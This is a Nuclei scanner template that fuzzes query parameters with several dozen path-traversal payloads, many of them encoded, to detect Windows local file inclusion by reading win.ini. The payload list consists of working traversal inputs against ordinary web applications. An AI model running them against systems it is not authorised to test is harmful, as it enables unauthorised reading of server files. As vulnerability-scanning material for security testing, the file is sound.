id: windows-lfi-fuzz
info:
name: Local File Inclusion - Windows
author: pussycat0x
severity: high
metadata:
max-request: 39
tags: lfi,windows,dast,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
win_fuzz:
low:
- '\WINDOWS\win.ini'
- '../../windows/win.ini'
- '....//....//windows/win.ini'
- '../../../../../windows/win.ini'
- '/..///////..////..//////windows/win.ini'
- '/../../../../../../../../../windows/win.ini'
- './../../../../../../../../../../windows/win.ini'
- '..%2f..%2f..%2f..%2fwindows/win.ini'
medium:
- '\WINDOWS\win.ini%00'
- '\WINNT\win.ini'
- '\WINNT\win.ini%00'
- 'windows/win.ini%00'
- '/...\...\...\...\...\...\...\...\...\windows\win.ini'
- '/.../.../.../.../.../.../.../.../.../windows/win.ini'
- '/..../..../..../..../..../..../..../..../..../windows/win.ini'
- '/....\....\....\....\....\....\....\....\....\windows\win.ini'
- '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
- '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
- '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
- '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
- '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
high:
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
- '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
- '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
- '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
- '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
- '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
- '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
- '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{win_fuzz}}'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# digest: 4a0a0047304502202c7451a1d8e2ce336cd69b4339d8bf006429f0251b6d195fcfeb02472188f3d5022100a1ad317fa882c654e50b3ece6492c6050dad00010369259be8ef2258e4bc4a18:922c64590222798bb761d5b6d8e72950